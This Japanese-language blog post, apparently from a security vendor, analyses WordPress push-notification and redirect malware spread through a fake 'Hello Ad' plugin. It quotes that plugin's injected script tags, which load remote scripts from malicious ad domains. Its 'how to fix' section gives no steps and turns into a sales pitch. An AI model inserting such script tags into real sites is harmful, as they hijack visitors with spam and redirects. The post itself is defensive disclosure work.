WordPress のプッシュ通知とリダイレクト マルウェアを修正する方法

ここ数週間、Astra のセキュリティ研究者は WordPress 上のプッシュ通知マルウェアを追跡してきました。 .このキャンペーンは、WordPress Web サイトで進行中のリダイレクト キャンペーンと組み合わされています。

リダイレクトが発生している悪意のあるドメインには、inpagepush[.]com、asoulrox[.]com、iclickcdn[.]com、justcannabis[.]online、0.realhelpcompany[.]ga、fast.helpmart[.]ga/ などがあります。 m[.]js?w=085 など

今回、ハッカーは一歩先を行って、感染した WordPress Web サイトに正当に見える「Hello 広告」プラグインをインストールすることで、このハッキング キャンペーンをより巧妙にしました。詳しくは以下をご覧ください。

関連ガイド – 完全な WordPress ハックの除去 ガイド

プッシュ通知マルウェアの症状 – WordPress

下品なプッシュ通知: Web サイトにアクセスしたときに、訪問者に悪意のある/下品なプッシュ通知が表示される:

ウェブサイトのリダイレクト: 当社の Web サイトからリンクをクリックすると、悪意のあるページに Web サイトがリダイレクトされます (理想的には、WordPress 内のページに移動する必要があります)。



inpagepush[.]com、asoulrox[.]com、iclickcdn[.]com など、Web サイトがリダイレクトしている可能性があるいくつかの URL。

デバイス固有/モバイル専用ウイルス: 私たちは、このマルウェアが自分自身を非常にうまく隠していることに気付きました。常にプッシュ通知を送信したり、ユーザーをリダイレクトしたりするとは限りません。動作はデバイス固有です。


マルウェアは、モバイル デバイスにのみプッシュ通知を表示する場合もあれば、以前に Web サイトを開いたことがあるユーザーではなく、新しいユーザーのみをリダイレクトする場合もあります。

悪意のある Hello Ad プラグインの奇妙なケース

これらの悪意のある Web サイトに「Hello 広告」プラグインが追加され、ハッカーが制御する Web サイトにユーザーをリダイレクトすることが確認されています。

この正当に見えるプラグインは、次の悪意のある Javascript コードをページ ソースに追加します:

<script>(function(s,u,z,p){s.src=u,s.setAttribute('data-zone',z),p.appendChild(s);})(document.createElement('script'),'https://iclickcdn.com/tag.min.js',3336627,document.body||document.documentElement)</script>
<script src="https://asoulrox.com/pfe/current/tag.min.js?z=3336643" data-cfasync="false" async></script>
<script type="text/javascript" src="//inpagepush.com/400/3336649" data-cfasync="false" async="async"></script>

このプラグインによって追加されたコードは、リダイレクトを行う上で重要な役割を果たします。ただし、ハッカーが進化し、新しいキャンペーンごとにこれを難読化しているのを見てきました.

プッシュ通知マルウェア、Hello Ad &Redirection Hack キャンペーンを修正する方法

ハッカーは、世の中に知られていない脆弱性を悪用したり、さまざまなエクスプロイトを組み合わせてハッキングを作成したりして、常に手法を進化させています。ハッキングを削除することは 1 つの部分ですが、ハッキングされないようにするためには、Astra のセキュリティ スイートのような、より永続的なものが必要です 🙂